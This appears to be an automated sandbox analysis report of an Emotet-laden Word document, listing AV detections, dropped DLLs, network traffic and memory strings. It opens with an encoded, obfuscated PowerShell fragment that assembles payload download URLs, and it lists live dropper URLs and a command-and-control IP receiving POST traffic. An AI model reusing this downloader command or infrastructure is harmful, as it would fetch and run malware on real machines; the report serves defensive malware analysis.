AnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://jflmktg.wpcomstaging.com/wp-content/AK/Avira URL Cloud: Label: malware
                      Source: http://nightlifemumbai.club/x/0wBD3/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.devAvira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dllReversingLabs: Detection: 39%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Order.docVirustotal: Detection: 32%Perma Link
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: nightlifemumbai.club
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49167 -> 190.55.186.229:80
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 190.55.186.229 190.55.186.229
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
                      Source: Joe Sandbox ViewASN Name: TelecentroSAAR TelecentroSAAR
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /efl8dd1i/ HTTP/1.1DNT: 0Referer: 190.55.186.229/efl8dd1i/Content-Type: multipart/form-data; boundary=------------diOigcaeBsfwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6388Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: nightlifemumbai.club
                      Source: unknownHTTP traffic detected: POST /efl8dd1i/ HTTP/1.1DNT: 0Referer: 190.55.186.229/efl8dd1i/Content-Type: multipart/form-data; boundary=------------diOigcaeBsfwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6388Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 22:13:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2090020372.000000000048A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, type: MEMORY
